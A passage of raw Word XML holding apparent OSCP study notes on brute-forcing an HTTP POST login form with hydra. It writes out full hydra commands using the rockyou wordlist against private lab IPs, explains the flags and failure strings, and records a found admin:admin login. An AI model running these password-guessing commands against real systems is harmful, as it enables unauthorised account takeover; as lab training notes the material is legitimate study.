                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId361"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3164850" cy="2576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280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see "User unknown or password wrong"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001281">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, now we have the parameters of the post request and two failure messages to try (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"login_failed"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"User unknown or password wrong"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001282">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also the target page was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001283">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.118.249</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/cms/admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001284">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payloads are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l admin -P </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e nsr 192.168.118.249 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cms/admin.php:username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^USER^&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^PASS^:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_failed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specified port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_failed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own error message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001289">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr 192.168.118.249 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cms/admin.php:username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^USER^&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^PASS^:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User unknown or password wrong</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128A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as the one above but with different error message that also worked since it showed up on the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128C">
      <w:pPr>
        <w:ind w:left="0" w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7824192" cy="1604963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="504" name="image488.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image488.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId362"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7824192" cy="1604963"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the correct one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Took like 9 minutes though</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001291">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a username wordlist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L user.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, capitalize L</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a single password instead of wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p password123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, don't capitalize p</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Old (don't think this works):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 15.1.3. HTTP POST Login Form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P /usr/share/wordlists/rockyou.txt -e nsr 192.168.50.201 http-post-form "/index.php:fm_usr=^USR^&amp;fm_pwd=^PASS^:Login failed. Invalid"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1274"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it sees "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login failed. Invalid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" then it knows the password is invalid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000129F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1274"/>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admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L [insert username] -P [insert password list] -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
